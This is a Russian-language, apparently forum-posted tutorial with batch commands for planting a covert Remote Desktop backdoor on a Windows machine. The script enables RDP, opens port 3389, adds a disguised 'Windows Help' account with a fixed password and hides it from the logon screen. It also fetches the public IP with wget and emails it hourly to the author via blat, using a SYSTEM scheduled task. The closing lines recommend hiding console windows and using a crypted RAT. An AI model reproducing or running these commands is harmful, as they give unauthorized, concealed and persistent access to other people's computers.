Всё это просто реализовать обыкновенным батником, воспользовавшись стандартными программами Windows.
Код:
@REM Включаем дистанционное управление рабочим столом
@REM Ставим галочку на Мой компьютер=>Свойства=>Удаленные сеансы=>Разрешить удаленный доступ к этому компьютеру
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
@REM Эти 2 команды отвечают за разрешения двух учетных записей вход
reg add "HKLM\SYSTEM\CurrentControlSet\Contr ol\Terminal Server\Licensing Core" /v EnableConcurrentSessions /t REG_DWORD /d 00000001 /f
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v EnableConcurrentSessions /t REG_DWORD /d 00000001 /f
@REM Эта строка отвечает за путь файла termsrv.dll
reg add "HKLM\SYSTEM\CurrentControlSet\services\TermService\Parameters" /v ServiceDll /t REG_EXPAND_SZ /d %SYSTEMROOT%\System32\termsrv.dll /f
@REM Заносим в Windows брат маузер запись что порт этот добрый
netsh firewall set portopening protocol=TCP port=3389
@REM делаем UserHelp участником группы Пользователи удаленного рабочего стола
net user UserHelp 230969230969 /add
net user UserHelp /comment:"Windows System User Help" /fullname:"Windows Help"
net localgroup "Пользователи удаленного рабочего стола" "UserHelp" /add
@REM Прячем нашу запись UserHelp
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v UserHelp /t REG_DWORD /d 00000000 /f
Правда, нужно будет воспользоваться несколькими сторонними консольными программами.
В частности, узнать адрес удалённой машины можно с помощью приведенной ниже команды.
Программу wget заранее нужно скачать на флэшку, которой ты планируешь воспользоваться и прописать в батнике команду для копирования её в системные папки windows.
Код:
move /y "wget.exe" "%SYSTEMROOT%\system32\wget.exe"
wget -O - -q icanhazip.com > c:\11.txt
Выслать на почту этот текстовый файл с адресом тебе может помочь программа blat.
Код:
move /y "blat.exe" "%SYSTEMROOT%\system32\blat.exe"
move /y "blat.lib" "%SYSTEMROOT%\system32\blat.lib"
move /y "blat.dll" "%SYSTEMROOT%\system32\blat.dll
move /y "blatdll.h" "%SYSTEMROOT%\system32\blatdll.h
%SYSTEMROOT%\System32\blat.exe C:\11.txt -subject %computername% -to адрес_ящика@mail.ru
del C:\11.txt
Осталось только воспользоваться планировщиком заданий windows и прописать команду для регулярной (в примере ежечасной) отправки тебе на электроящик текстового файла с адресом удалённой машины.
Код:
schtasks /create /tn "security" /sc minute /mo 60 /ru "NT AUTHORITY\SYSTEM" /tr %systemroot%\system32\rm\ip.bat /f
Для того, чтобы консольные окна не показывались во время работы этих программ, существуют также программные решения.
Для сокрытия окон командной строки в сети достаточно программ для скачивания ))
PostScriptum.
Примерно два месяца назад мне на глаза совершенно случайно попадалась программа, которая проделывала все эти мои описанные действия. Программа была бесплатная. Но дело было ночью, я уже ничего не соображала. Поэтому, адрес благополучно затеряла - а жаль. Может найду - выложу.
Кроме того, примерно год назад на хак-форумах распространялась софтина, которая занималась этими-же фокусами )) Но та была платной и приватной ))
PostScriptum ver_ 2.0
Кроме того, для достижения цели ты можешь воспользоваться любым ратником, предварительно закриптовав его.
